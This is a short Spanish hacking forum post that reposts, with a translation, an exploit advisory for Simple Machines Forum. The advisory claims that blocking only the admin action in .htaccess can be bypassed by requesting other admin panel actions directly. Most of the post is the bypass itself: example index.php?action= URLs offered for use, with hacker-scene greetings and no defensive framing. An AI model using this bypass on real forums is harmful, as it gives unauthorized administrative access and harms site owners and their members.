SMF .htaccess ByPass

Iniciado por dracko.rx, Febrero 24, 2010, 03:26:19 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Febrero 24, 2010, 03:26:19 PM
SMF .htaccess ByPass

Discovered by Seph1roth on June 2007 (was priv8)
#
# Vulnerable: Simple Machine Forum [ALL Versions]
#
# Visit: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login - Best hacking site.
#
# Description:

If smf has index.php?action=admin in .htaccess ,i can bypass that by typing in the url some variable of administration panel :

example:

index.php?action=admin (.htaccess,then access denied)
index.php?action=membergroups (accessible)
index.php?action=news (accessible)
index.php?action=featuresettings (accessible)

...and others...

i can bypass and enter the administration by typing the accessible variables in the url...

# Greets to all BlackRoots Users
#
# Shoutz to all kiddies
#
# ./end

-------------------

Traduccion rapidita:

Vulnerable: Simple Machine Forum [Todas las Versiones]

# Description:

si el smf tiene .htaccess en index.php?action=admin, se puede bypasear escribiendo en la url una variable dentro del panel de administracion.

Ejemplo:

index.php?action=admin (.htaccess, DENEGADO)
index.php?action=membergroups (accessible)
index.php?action=news (accessible)
index.php?action=featuresettings (accessible)

Bytes

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Venta de diseños - Contactar por MP

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Imprimir
Ir Arriba Páginas1
Acciones del Usuario